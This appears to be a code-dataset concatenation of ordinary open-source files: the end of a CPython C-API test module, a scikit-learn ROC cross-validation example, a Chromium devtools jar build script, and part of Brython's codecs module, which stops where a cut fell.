_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format.encode("ascii"), keywords)
when_not_skipped = False
except TypeError as e:
s = "argument 1 must be impossible<bad format char>, not int"
when_not_skipped = (str(e) == s)
except RuntimeError as e:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format.encode("ascii"), keywords)
when_skipped = False
except RuntimeError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# parse_tuple_and_keywords error handling tests
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [42])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
with self.subTest("internal", name=name):
test = getattr(_testcapi, name)
test()
if __name__ == "__main__":
unittest.main()
| gpl-3.0 |
marcocaccin/scikit-learn | examples/model_selection/plot_roc_crossval.py | 247 | 3253 | """
=============================================================
Receiver Operating Characteristic (ROC) with cross validation
=============================================================
Example of Receiver Operating Characteristic (ROC) metric to evaluate
classifier output quality using cross-validation.
ROC curves typically feature true positive rate on the Y axis, and false
positive rate on the X axis. This means that the top left corner of the plot is
the "ideal" point - a false positive rate of zero, and a true positive rate of
one. This is not very realistic, but it does mean that a larger area under the
curve (AUC) is usually better.
The "steepness" of ROC curves is also important, since it is ideal to maximize
the true positive rate while minimizing the false positive rate.
This example shows the ROC response of different datasets, created from K-fold
cross-validation. Taking all of these curves, it is possible to calculate the
mean area under curve, and see the variance of the curve when the
training set is split into different subsets. This roughly shows how the
classifier output is affected by changes in the training data, and how
different the splits generated by K-fold cross-validation are from one another.
.. note::
See also :func:`sklearn.metrics.auc_score`,
:func:`sklearn.cross_validation.cross_val_score`,
:ref:`example_model_selection_plot_roc.py`,
"""
print(__doc__)
import numpy as np
from scipy import interp
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.metrics import roc_curve, auc
from sklearn.cross_validation import StratifiedKFold
###############################################################################
# Data IO and generation
# import some data to play with
iris = datasets.load_iris()
X = iris.data
y = iris.target
X, y = X[y != 2], y[y != 2]
n_samples, n_features = X.shape
# Add noisy features
random_state = np.random.RandomState(0)
X = np.c_[X, random_state.randn(n_samples, 200 * n_features)]
###############################################################################
# Classification and ROC analysis
# Run classifier with cross-validation and plot ROC curves
cv = StratifiedKFold(y, n_folds=6)
classifier = svm.SVC(kernel='linear', probability=True,
random_state=random_state)
mean_tpr = 0.0
mean_fpr = np.linspace(0, 1, 100)
all_tpr = []
for i, (train, test) in enumerate(cv):
probas_ = classifier.fit(X[train], y[train]).predict_proba(X[test])
# Compute ROC curve and area the curve
fpr, tpr, thresholds = roc_curve(y[test], probas_[:, 1])
mean_tpr += interp(mean_fpr, fpr, tpr)
mean_tpr[0] = 0.0
roc_auc = auc(fpr, tpr)
plt.plot(fpr, tpr, lw=1, label='ROC fold %d (area = %0.2f)' % (i, roc_auc))
plt.plot([0, 1], [0, 1], '--', color=(0.6, 0.6, 0.6), label='Luck')
mean_tpr /= len(cv)
mean_tpr[-1] = 1.0
mean_auc = auc(mean_fpr, mean_tpr)
plt.plot(mean_fpr, mean_tpr, 'k--',
label='Mean ROC (area = %0.2f)' % mean_auc, lw=2)
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic example')
plt.legend(loc="lower right")
plt.show()
| bsd-3-clause |
ahmadassaf/Chrome-devtools-app | app/devtools/scripts/jsdoc-validator/build_jsdoc_validator_jar.py | 66 | 5099 | #!/usr/bin/python
import hashlib
import operator
import os
import shutil
import stat
import subprocess
import sys
import tempfile
def rel_to_abs(rel_path):
return os.path.join(script_path, rel_path)
java_bin_path = os.getenv('JAVA_HOME', '')
if java_bin_path:
java_bin_path = os.path.join(java_bin_path, 'bin')
main_class = 'org.chromium.devtools.jsdoc.JsDocValidator'
jar_name = 'jsdoc-validator.jar'
hashes_name = 'hashes'
src_dir = 'src'
script_path = os.path.dirname(os.path.abspath(__file__))
closure_jar_relpath = os.path.join('..', 'closure', 'compiler.jar')
src_path = rel_to_abs(src_dir)
hashes_path = rel_to_abs(hashes_name)
def get_file_hash(file, blocksize=65536):
sha = hashlib.sha256()
buf = file.read(blocksize)
while len(buf) > 0:
sha.update(buf)
buf = file.read(blocksize)
return sha.hexdigest()
def traverse(hasher, path):
abs_path = rel_to_abs(path)
info = os.lstat(abs_path)
quoted_name = repr(path.replace('\\', '/'))
if stat.S_ISDIR(info.st_mode) and not os.path.basename(path).startswith('.'):
hasher.update('d ' + quoted_name + '\n')
for entry in sorted(os.listdir(abs_path)):
traverse(hasher, os.path.join(path, entry))
elif stat.S_ISREG(info.st_mode) and path.endswith('.java'):
hasher.update('r ' + quoted_name + ' ')
hasher.update(str(info.st_size) + ' ')
with open(abs_path, 'Ur') as file:
f_hash = get_file_hash(file)
hasher.update(f_hash + '\n')
def get_src_dir_hash(dir):
sha = hashlib.sha256()
traverse(sha, dir)
return sha.hexdigest()
def get_actual_hashes():
hashed_files = [(jar_name, True)]
hashes = {}
for (file_name, binary) in hashed_files:
try:
hash = get_file_hash(open(file_name, 'rb' if binary else 'r'))
hashes[file_name] = hash
except IOError:
hashes[file_name] = '0'
hashes[src_dir] = get_src_dir_hash(src_dir)
return hashes
def get_expected_hashes():
try:
with open(hashes_path, 'r') as file:
return {file_name: hash for (file_name, hash) in [(name.strip(), hash.strip()) for (hash, name) in [line.split(' ', 1) for line in file]]}
except:
return None
def run_and_communicate(command, error_template):
proc = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
proc.communicate()
if proc.returncode:
print >> sys.stderr, error_template % proc.returncode
sys.exit(proc.returncode)
def build_artifacts():
print 'Compiling...'
java_files = []
for root, dirs, files in sorted(os.walk(src_path)):
for file_name in files:
if file_name.endswith('.java'):
java_files.append(os.path.join(root, file_name))
bin_path = tempfile.mkdtemp()
manifest_file = tempfile.NamedTemporaryFile(mode='wt', delete=False)
try:
manifest_file.write('Class-Path: %s\n' % closure_jar_relpath)
manifest_file.close()
javac_path = os.path.join(java_bin_path, 'javac')
javac_command = '%s -d %s -cp %s %s' % (javac_path, bin_path, rel_to_abs(closure_jar_relpath), ' '.join(java_files))
run_and_communicate(javac_command, 'Error: javac returned %d')
print 'Building jar...'
artifact_path = rel_to_abs(jar_name)
jar_path = os.path.join(java_bin_path, 'jar')
jar_command = '%s cvfme %s %s %s -C %s .' % (jar_path, artifact_path, manifest_file.name, main_class, bin_path)
run_and_communicate(jar_command, 'Error: jar returned %d')
finally:
os.remove(manifest_file.name)
shutil.rmtree(bin_path, True)
def update_hashes():
print 'Updating hashes...'
with open(hashes_path, 'w') as file:
file.writelines(['%s %s\n' % (hash, name) for (name, hash) in get_actual_hashes().iteritems()])
def hashes_modified():
expected_hashes = get_expected_hashes()
if not expected_hashes:
return [('<no expected hashes>', 1, 0)]
actual_hashes = get_actual_hashes()
results = []
for name, expected_hash in expected_hashes.iteritems():
actual_hash = actual_hashes.get(name)
if expected_hash != actual_hash:
results.append((name, expected_hash, actual_hash))
return results
def help():
print 'usage: %s [option]' % os.path.basename(__file__)
print 'Options:'
print '--force-rebuild: Rebuild classes and jar even if there are no source file changes'
print '--no-rebuild: Do not rebuild jar, just update hashes'
def main():
no_rebuild = False
force_rebuild = False
if len(sys.argv) > 1:
if sys.argv[1] == '--help':
help()
return
no_rebuild = sys.argv[1] == '--no-rebuild'
force_rebuild = sys.argv[1] == '--force-rebuild'
if not hashes_modified() and not force_rebuild:
print 'No modifications found, rebuild not required.'
return
if not no_rebuild:
build_artifacts()
update_hashes()
print 'Done.'
if __name__ == '__main__':
main()
| mit |
jperon/musite | static/js/brython/Lib/codecs.py | 739 | 35436 | """ codecs -- Python Codec Registry, API and helpers.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""#"
import builtins, sys
### Registry and builtin stateless codec functions
try:
from _codecs import *
except ImportError as why:
raise SystemError('Failed to load the builtin codecs: %s' % why)
__all__ = ["register", "lookup", "open", "EncodedFile", "BOM", "BOM_BE",
"BOM_LE", "BOM32_BE", "BOM32_LE", "BOM64_BE", "BOM64_LE",
"BOM_UTF8", "BOM_UTF16", "BOM_UTF16_LE", "BOM_UTF16_BE",
"BOM_UTF32", "BOM_UTF32_LE", "BOM_UTF32_BE",
"strict_errors", "ignore_errors", "replace_errors",
"xmlcharrefreplace_errors",
"register_error", "lookup_error"]
### Constants
#
# Byte Order Mark (BOM = ZERO WIDTH NO-BREAK SPACE = U+FEFF)
# and its possible byte string values
# for UTF8/UTF16/UTF32 output and little/big endian machines
#
# UTF-8
BOM_UTF8 = b'\xef\xbb\xbf'
# UTF-16, little endian
BOM_LE = BOM_UTF16_LE = b'\xff\xfe'
# UTF-16, big endian
BOM_BE = BOM_UTF16_BE = b'\xfe\xff'
# UTF-32, little endian
BOM_UTF32_LE = b'\xff\xfe\x00\x00'
# UTF-32, big endian
BOM_UTF32_BE = b'\x00\x00\xfe\xff'
if sys.byteorder == 'little':
# UTF-16, native endianness
BOM = BOM_UTF16 = BOM_UTF16_LE
# UTF-32, native endianness
BOM_UTF32 = BOM_UTF32_LE
else:
# UTF-16, native endianness
BOM = BOM_UTF16 = BOM_UTF16_BE
# UTF-32, native endianness
BOM_UTF32 = BOM_UTF32_BE
# Old broken names (don't use in new code)
BOM32_LE = BOM_UTF16_LE
BOM32_BE = BOM_UTF16_BE
BOM64_LE = BOM_UTF32_LE
BOM64_BE = BOM_UTF32_BE
### Codec base classes (defining the API)
class CodecInfo(tuple):
def __new__(cls, encode, decode, streamreader=None, streamwriter=None,
incrementalencoder=None, incrementaldecoder=None, name=None):
self = tuple.__new__(cls, (encode, decode, streamreader, streamwriter))
self.name = name
self.encode = encode
self.decode = decode
self.incrementalencoder = incrementalencoder
self.incrementaldecoder = incrementaldecoder
self.streamwriter = streamwriter
self.streamreader = streamreader
return self
def __repr__(self):
return "<%s.%s object for encoding %s at 0x%x>" % \
(self.__class__.__module__, self.__class__.__name__,
self.name, id(self))
class Codec:
""" Defines the interface for stateless encoders/decoders.
The .encode()/.decode() methods may use different error
handling schemes by providing the errors argument. These
string values are predefined:
'strict' - raise a ValueError error (or a subclass)
'ignore' - ignore the character and continue with the next
'replace' - replace with a suitable replacement character;
Python will use the official U+FFFD REPLACEMENT
CHARACTER for the builtin Unicode codecs on
decoding and '?' on encoding.
'surrogateescape' - replace with private codepoints U+DCnn.
'xmlcharrefreplace' - Replace with the appropriate XML
character reference (only for encoding).
'backslashreplace' - Replace with backslashed escape sequences
(only for encoding).
The set of allowed values can be extended via register_error.
"""
def encode(self, input, errors='strict'):
""" Encodes the object input and returns a tuple (output
object, length consumed).
errors defines the error handling to apply. It defaults to
'strict' handling.
The method may not store state in the Codec instance. Use
StreamCodec for codecs which have to keep state in order to
make encoding/decoding efficient.
The encoder must be able to handle zero length input and
return an empty object of the output object type in this
situation.
"""
raise NotImplementedError
def decode(self, input, errors='strict'):
""" Decodes the object input and returns a tuple (output
object, length consumed).
input must be an object which provides the bf_getreadbuf
buffer slot. Python strings, buffer objects and memory
mapped files are examples of objects providing this slot.
errors defines the error handling to apply. It defaults to
'strict' handling.
The method may not store state in the Codec instance. Use
StreamCodec for codecs which have to keep state in order to
make encoding/decoding efficient.
The decoder must be able to handle zero length input and
return an empty object of the output object type in this
situation.
"""
raise NotImplementedError
class IncrementalEncoder(object):
"""
An IncrementalEncoder encodes an input in multiple steps. The input can
be passed piece by piece to the encode() method. The IncrementalEncoder
remembers the state of the encoding process between calls to encode().
"""
def __init__(self, errors='strict'):
"""
Creates an IncrementalEncoder instance.
The IncrementalEncoder may use different error handling schemes by
providing the errors keyword argument. See the module docstring
for a list of possible values.
"""
self.errors = errors
self.buffer = ""
def encode(self, input, final=False):
"""
Encodes input and returns the resulting object.
"""
raise NotImplementedError
def reset(self):
"""
Resets the encoder to the initial state.
"""
def getstate(self):
"""
Return the current state of the encoder.
"""
return 0
def setstate(self, state):
"""
Set the current state of the encoder. state must have been
returned by getstate().
"""
class BufferedIncrementalEncoder(IncrementalEncoder):
"""
This subclass of IncrementalEncoder can be used as the baseclass for an
incremental encoder if the encoder must keep some of the output in a
buffer between calls to encode().
"""
def __init__(self, errors='strict'):
IncrementalEncoder.__init__(self, errors)
# unencoded input that is kept between calls to encode()
self.buffer = ""
def _buffer_encode(self, input, errors, final):
# Overwrite this method in subclasses: It must encode input
# and return an (output, length consumed) tuple
raise NotImplementedError
def encode(self, input, final=False):
# encode input (taking the buffer into account)
data = self.buffer + input
(result, consumed) = self._buffer_encode(data, self.errors, final)
# keep unencoded input until the next call
self.buffer = data[consumed:]
return result
def reset(self):
IncrementalEncoder.reset(self)
self.buffer = ""
def getstate(self):
return self.buffer or 0
def setstate(self, state):
self.buffer = state or ""
class IncrementalDecoder(object):
"""
An IncrementalDecoder decodes an input in multiple steps. The input can
be passed piece by piece to the decode() method. The IncrementalDecoder
remembers the state of the decoding process between calls to decode().
"""
def __init__(self, errors='strict'):
"""
Create a IncrementalDecoder instance.
The IncrementalDecoder may use different error handling schemes by
providing the errors keyword argument. See the module docstring
for a list of possible values.
"""
self.errors = errors
def decode(self, input, final=False):
"""
Decode input and returns the resulting object.
"""
raise NotImplementedError
def reset(self):
"""
Reset the decoder to the initial state.
"""
def getstate(self):
"""
Return the current state of the decoder.
This must be a (buffered_input, additional_state_info) tuple.
buffered_input must be a bytes object containing bytes that
were passed to decode() that have not yet been converted.
additional_state_info must be a non-negative integer
representing the state of the decoder WITHOUT yet having
processed the contents of buffered_input. In the initial state
and after reset(), getstate() must return (b"", 0).
"""
return (b"", 0)
def setstate(self, state):
"""
Set the current state of the decoder.
state must have been returned by getstate(). The effect of
setstate((b"", 0)) must be equivalent to reset().
"""
class BufferedIncrementalDecoder(IncrementalDecoder):
"""
This subclass of IncrementalDecoder can be used as the baseclass for an
incremental decoder if the decoder must be able to handle incomplete
byte sequences.
"""
def __init__(self, errors='strict'):
IncrementalDecoder.__init__(self, errors)
# undecoded input that is kept between calls to decode()
self.buffer = b""
def _buffer_decode(self, input, errors, final):
# Overwrite this method in subclasses: It must decode input
# and return an (output, length consumed) tuple
raise NotImplementedError
def decode(self, input, final=False):
# decode input (taking the buffer into account)
data = self.buffer + input
(result, consumed) = self._buffer_decode(data, self.errors, final)
# keep undecoded input until the next call
self.buffer = data[consumed:]
return result
def reset(self):
IncrementalDecoder.reset(self)
self.buffer = b""
def getstate(self):
# additional state info is always 0
return (self.buffer, 0)
def setstate(self, state):
# ignore additional state info
self.buffer = state[0]
#
# The StreamWriter and StreamReader class provide generic working
# interfaces which can be used to implement new encoding submodules
# very easily. See encodings/utf_8.py for an example on how this is
# done.
#
class StreamWriter(Codec):
def __init__(self, stream, errors='strict'):
""" Creates a StreamWriter instance.
stream must be a file-like object open for writing
(binary) data.
The StreamWriter may use different error handling
schemes by providing the errors keyword argument. These
parameters are predefined:
'strict' - raise a ValueError (or a subclass)
'ignore' - ignore the character and continue with the next
'replace'- replace with a suitable replacement character
'xmlcharrefreplace' - Replace with the appropriate XML
character reference.
'backslashreplace' - Replace with backslashed escape
sequences (only for encoding).
The set of allowed parameter values can be extended via
register_error.
"""
self.stream = stream
self.errors = errors
def write(self, object):
""" Writes the object's contents encoded to self.stream.
"""
data, consumed = self.encode(object, self.errors)
self.stream.write(data)
def writelines(self, list):
""" Writes the concatenated list of strings to the stream
using .write().
"""
self.write(''.join(list))
def reset(self):
""" Flushes and resets the codec buffers used for keeping state.
Calling this method should ensure that the data on the
output is put into a clean state, that allows appending
of new fresh data without having to rescan the whole
stream to recover state.
"""
pass
def seek(self, offset, whence=0):
self.stream.seek(offset, whence)
if whence == 0 and offset == 0:
self.reset()
def __getattr__(self, name,
getattr=getattr):
""" Inherit all other methods from the underlying stream.
"""
return getattr(self.stream, name)
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stream.close()
###
class StreamReader(Codec):
charbuffertype = str
def __init__(self, stream, errors='strict'):
""" Creates a StreamReader instance.
stream must be a file-like object open for reading
(binary) data.
The StreamReader may use different error handling
schemes by providing the errors keyword argument. These
parameters are predefined:
'strict' - raise a ValueError (or a subclass)
'ignore' - ignore the character and continue with the next
'replace'- replace with a suitable replacement character;
The set of allowed parameter values can be extended via
register_error.
"""
self.stream = stream
self.errors = errors
self.bytebuffer = b""
self._empty_charbuffer = self.charbuffertype()
self.charbuffer = self._empty_charbuffer
self.linebuffer = None
def decode(self, input, errors='strict'):
raise NotImplementedError
def read(self, size=-1, chars=-1, firstline=False):
""" Decodes data from the stream self.stream and returns the
resulting object.
chars indicates the number of characters to read from the
stream. read() will never return more than chars
characters, but it might return less, if there are not enough
characters available.
size indicates the approximate maximum number of bytes to
read from the stream for decoding purposes. The decoder
can modify this setting as appropriate. The default value
-1 indicates to read and decode as much as possible. size
is intended to prevent having to decode huge files in one
step.
If firstline is true, and a UnicodeDecodeError happens
after the first line terminator in the input only the first line
will be returned, the rest of the input will be kept until the
next call to read().
The method should use a greedy read strategy meaning that
it should read as much data as is allowed within the
definition of the encoding and the given size, e.g. if
optional encoding endings or state markers are available
on the stream, these should be read too.
"""
# If we have lines cached, first merge them back into characters
if self.linebuffer:
self.charbuffer = self._empty_charbuffer.join(self.linebuffer)
self.linebuffer = None
# read until we get the required number of characters (if available)
while True:
# can the request be satisfied from the character buffer?
if chars < 0:
if size < 0:
if self.charbuffer:
break
elif len(self.charbuffer) >= size:
break
else:
if len(self.charbuffer) >= chars:
break
# we need more data
if size < 0:
newdata = self.stream.read()
else:
newdata = self.stream.read(size)
# decode bytes (those remaining from the last call included)
data = self.bytebuffer + newdata
try:
newchars, decodedbytes = self.decode(data, self.errors)
except UnicodeDecodeError as exc:
if firstline:
newchars, decodedbytes = \
self.decode(data[:exc.start], self.errors)
lines = newchars.splitlines(keepends=True)
if len(lines)<=1:
raise
else:
raise
# keep undecoded bytes until the next call
self.bytebuffer = data[decodedbytes:]
# put new characters in the character buffer
self.charbuffer += newchars
# there was no data available
if not newdata:
break
if chars < 0:
# Return everything we've got
result = self.charbuffer
self.charbuffer = self._empty_charbuffer
else:
# Return the first chars characters
result = self.charbuffer[:chars]
self.charbuffer = self.charbuffer[chars:]
return result
def readline(self, size=None, keepends=True):
""" Read one line from the input stream and return the
decoded data.
size, if given, is passed as size argument to the
read() method.
"""
# If we have lines cached from an earlier read, return
# them unconditionally
if self.linebuffer:
line = self.linebuffer[0]
del self.linebuffer[0]
if len(self.linebuffer) == 1:
# revert to charbuffer mode; we might need more data
# next time
self.charbuffer = self.linebuffer[0]
self.linebuffer = None
if not keepends:
line = line.splitlines(keepends=False)[0]
return line
readsize = size or 72
line = self._empty_charbuffer
# If size is given, we call read() only once
while True:
data = self.read(readsize, firstline=True)
if data:
# If we're at a "\r" read one extra character (which might
# be a "\n") to get a proper line ending. If the stream is
# temporarily exhausted we return the wrong line ending.
if (isinstance(data, str) and data.endswith("\r")) or \
(isinstance(data, bytes) and data.endswith(b"\r")):
data += self.read(size=1, chars=1)
line += data
lines = line.splitlines(keepends=True)
if lines:
if len(lines) > 1:
# More than one line result; the first line is a full line
# to return
line = lines[0]
del lines[0]
if len(lines) > 1:
# cache the remaining lines
lines[-1] += self.charbuffer
self.linebuffer = lines
self.charbuffer = None
else:
# only one remaining line, put it back into charbuffer
self.charbuffer = lines[0] + self.charbuffer
if not keepends:
line = line.splitlines(keepends=False)[0]
break
line0withend = lines[0]
line0withoutend = lines[0].splitlines(keepends=False)[0]
if line0withend != line0withoutend: # We really have a line end
# Put the rest back together and keep it until the next call
self.charbuffer = self._empty_charbuffer.join(lines[1:]) + \
self.charbuffer
if keepends:
line = line0withend
else:
line = line0withoutend
break
# we didn't get anything or this was our only try
if not data or size is not None:
if line and not keepends:
line = line.splitlines(keepends=False)[0]
break
if readsize < 8000:
readsize *= 2
return line
def readlines(self, sizehint=None, keepends=True):
""" Read all lines available on the input stream
and return them as list of lines.
Line breaks are implemented using the codec's decoder
method and are included in the list entries.
sizehint, if given, is ignored since there is no efficient
way to finding the true end-of-line.
"""
data = self.read()
return data.splitlines(keepends)
def reset(self):
""" Resets the codec buffers used for keeping state.
Note that no stream repositioning should take place.
This method is primarily intended to be able to recover
from decoding errors.
"""
self.bytebuffer = b""
self.charbuffer = self._empty_charbuffer
self.linebuffer = None
def seek(self, offset, whence=0):
""" Set the input stream's current position.
Resets the codec buffers used for keeping state.
"""
self.stream.seek(offset, whence)
self.reset()
def __next__(self):
""" Return the next decoded line from the input stream."""
line = self.readline()
if line:
return line
raise StopIteration
def __iter__(self):
return self
def __getattr__(self, name,
getattr=getattr):
""" Inherit all other methods from the underlying stream.
"""
return getattr(self.stream, name)
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stream.close()
###
class StreamReaderWriter:
""" StreamReaderWriter instances allow wrapping streams which
work in both read and write modes.
The design is such that one can use the factory functions
returned by the codec.lookup() function to construct the
instance.
"""
# Optional attributes set by the file wrappers below
encoding = 'unknown'
def __init__(self, stream, Reader, Writer, errors='strict'):
""" Creates a StreamReaderWriter instance.
stream must be a Stream-like object.
Reader, Writer must be factory functions or classes
providing the StreamReader, StreamWriter interface resp.
Error handling is done in the same way as defined for the
StreamWriter/Readers.
"""
self.stream = stream
self.reader = Reader(stream, errors)
self.writer = Writer(stream, errors)
self.errors = errors
def read(self, size=-1):
return self.reader.read(size)
def readline(self, size=None):
return self.reader.readline(size)
def readlines(self, sizehint=None):
return self.reader.readlines(sizehint)
def __next__(self):
""" Return the next decoded line from the input stream."""
return next(self.reader)
def __iter__(self):
return self
def write(self, data):
return self.writer.write(data)
def writelines(self, list):
return self.writer.writelines(list)
def reset(self):
self.reader.reset()
self.writer.reset()
def seek(self, offset, whence=0):
self.stream.seek(offset, whence)
self.reader.reset()
if whence == 0 and offset == 0:
self.writer.reset()
def __getattr__(self, name,
getattr=getattr):
""" Inherit all other methods from the underlying stream.
"""
return getattr(self.stream, name)
# these are needed to make "with codecs.open(...)" work properly
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stream.close()
###
class StreamRecoder:
""" StreamRecoder instances provide a frontend - backend
view of encoding data.
They use the complete set of APIs returned by the
codecs.lookup() function to implement their task.
Data written to the stream is first decoded into an
intermediate format (which is dependent on the given codec
combination) and then written to the stream using an instance
of the provided Writer class.
In the other direction, data is read from the stream using a
Reader instance and then return encoded data to the caller.
"""
# Optional attributes set by the file wrappers below
data_encoding = 'unknown'
file_encoding = 'unknown'
def __init__(self, stream, encode, decode, Reader, Writer,
errors='strict'):
""" Creates a StreamRecoder instance which implements a two-way
conversion: encode and decode work on the frontend (the
input to .read() and output of .write()) while
Reader and Writer work on the backend (reading and
writing to the stream).
You can use these objects to do transparent direct
recodings from e.g. latin-1 to utf-8 and back.
stream must be a file-like object.
encode, decode must adhere to the Codec interface, Reader,
Writer must be factory functions or classes providing the
StreamReader, StreamWriter interface resp.
encode and decode are needed for the frontend translation,
Reader and Writer for the backend translation. Unicode is
used as intermediate encoding.
Error handling is done in the same way as defined for the
StreamWriter/Readers.
"""
self.stream = stream
self.encode = encode
self.decode = decode
self.reader = Reader(stream, errors)
self.writer = Writer(stream, errors)
self.errors = errors
def read(self, size=-1):
data = self.reader.read(size)
data, bytesencoded = self.encode(data, self.errors)
return data
def readline(self, size=None):
if size is None:
data = self.reader.readline()
else:
data = self.reader.readline(size)
data, bytesencoded = self.encode(data, self.errors)
return data
def readlines(self, sizehint=None):
data = self.reader.read()
data, bytesencoded = self.encode(data, self.errors)
return data.splitlines(keepends=True)
def __next__(self):
""" Return the next decoded line from the input stream."""
data = next(self.reader)
data, bytesencoded = self.encode(data, self.errors)
return data
def __iter__(self):
return self
def write(self, data):
data, bytesdecoded = self.decode(data, self.errors)
return self.writer.write(data)
def writelines(self, list):
data = ''.join(list)
data, bytesdecoded = self.decode(data, self.errors)
return self.writer.write(data)
def reset(self):
self.reader.reset()
self.writer.reset()
def __getattr__(self, name,
getattr=getattr):
""" Inherit all other methods from the underlying stream.
"""
return getattr(self.stream, name)
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stream.close()
### Shortcuts
def open(filename, mode='rb', encoding=None, errors='strict', buffering=1):
""" Open an encoded file using the given mode and return
a wrapped version providing transparent encoding/decoding.
Note: The wrapped version will only accept the object format
defined by the codecs, i.e. Unicode objects for most builtin
codecs. Output is also codec dependent and will usually be
Unicode as well.
Files are always opened in binary mode, even if no binary mode
was specified. This is done to avoid data loss due to encodings
using 8-bit values. The default file mode is 'rb' meaning to
open the file in binary read mode.
encoding specifies the encoding which is to be used for the
file.
errors may be given to define the error handling. It defaults
to 'strict' which causes ValueErrors to be raised in case an
encoding error occurs.
buffering has the same meaning as for the builtin open() API.
It defaults to line buffered.
The returned wrapped file object provides an extra attribute
.encoding which allows querying the used encoding. This
attribute is only available if an encoding was specified as
parameter.
"""
if encoding is not None and \
'b' not in mode:
# Force opening of the file in binary mode
mode = mode + 'b'
file = builtins.open(filename, mode, buffering)
if encoding is None:
return file
info = lookup(encoding)
srw = StreamReaderWriter(file, info.streamreader, info.streamwriter, errors)
# Add attributes to simplify introspection
srw.encoding = encoding
return srw
def EncodedFile(file, data_encoding, file_encoding=None, errors='strict'):
""" Return a wrapped version of file which provides transparent
encoding translation.
Strings written to the wrapped file are interpreted according
to the given data_encoding and then written to the original
file as string using file_encoding. The intermediate encoding
will usually be Unicode but depends on the specified codecs.
Strings are read from the file using file_encoding and then
passed back to the caller as string using data_encoding.
If file_encoding is not given, it defaults to data_encoding.
errors may be given to define the error handling. It defaults
to 'strict' which causes ValueErrors to be raised in case an
encoding error occurs.
The returned wrapped file object provides two extra attributes
.data_encoding and .file_encoding which reflect the given
parameters of the same name. The attributes can be used for
introspection by Python programs.
"""
if file_encoding is None:
file_encoding = data_encoding
data_info = lookup(data_encoding)
file_info = lookup(file_encoding)
sr = StreamRecoder(file, data_info.encode, data_info.decode,
file_info.streamreader, file_info.streamwriter, errors)
# Add attributes to simplify introspection
sr.data_encoding = data_encoding
sr.file_encoding = file_encoding
return sr
### Helpers for codec lookup
def getencoder(encoding):
""" Lookup up the codec for the given encoding and return
its encoder function.
Raises a LookupError in case the encoding cannot be found.
"""
return lookup(encoding).encode
def getdecoder(encoding):
""" Lookup up the codec for the given encoding and return
its decoder function.
Raises a LookupError in case the encoding cannot be found.
"""
return lookup(encoding).decode
def getincrementalencoder(encoding):
""" Lookup up the codec for the given encoding and return
its IncrementalEncoder class or factory function.
Raises a LookupError in case the encoding cannot be found
or the codecs doesn't provide an incremental encoder.
"""
encoder = lookup(encoding).incrementalencoder
if encoder is None:
raise LookupError(encoding)
return encoder
def getincrementaldecoder(encoding):
""" Lookup up the codec for the given encoding and return
its IncrementalDecoder class or factory function.
Raises a LookupError in case the encoding cannot be found
or the codecs doesn't provide an incremental decoder.
"""
decoder = lookup(encoding).incrementaldecoder
if decoder is None:
raise LookupError(encoding)
return decoder
def getreader(encoding):
""" Lookup up the codec for the given encoding and return
its StreamReader class or factory function.
Raises a LookupError in case the encoding cannot be found.
"""
return lookup(encoding).streamreader
def getwriter(encoding):
""" Lookup up the codec for the given encoding and return
its StreamWriter class or factory function.
Raises a LookupError in case the encoding cannot be found.
"""
return lookup(encoding).streamwriter
def iterencode(iterator, encoding, errors='strict', **kwargs):
"""
Encoding iterator.
Encodes the input strings from the iterator using a IncrementalEncoder.
errors and kwargs are passed through to the IncrementalEncoder
constructor.
"""
encoder = getincrementalencoder(encoding)(errors, **kwargs)
for input in iterator:
output = encoder.encode(input)
if output:
yield output
output = encoder.encode("", True)
if output:
yield output
def iterdecode(iterator, encoding, errors='strict', **kwargs):
"""
Decoding iterator.
Decodes the input strings from the iterator using a IncrementalDecoder.
errors and kwargs are passed through to the IncrementalDecoder
constructor.
"""
decoder = getincrementaldecoder(encoding)(errors, **kwargs)
for input in iterator:
output = decoder.decode(input)
if output:
yield output
output = decoder.decode(b"", True)
if output:
yield output
### Helpers for charmap-based codecs
def make_identity_dict(rng):
""" make_identity_dict(rng) -> dict
Return a dictionary where elements of the rng sequence are
mapped to themselves.
"""
return {i:i for i in rng}
def make_encoding_map(decoding_map):
""" Creates an encoding map from a decoding map.
If a target mapping in the decoding map occurs multiple
times, then that target is mapped to None (undefined mapping),
causing an exception when encountered by the charmap codec
during translation.
One example where this happens is cp875.py which decodes
multiple character to \u001a.
"""
m = {}
for k,v in decoding_map.items():
if not v in m:
m[v] = k
else:
m[v] = None
return m
### error handlers
try:
strict_errors = lookup_error("strict")
ignore_errors = lookup_error("ignore")
replace_errors = lookup_error("replace")
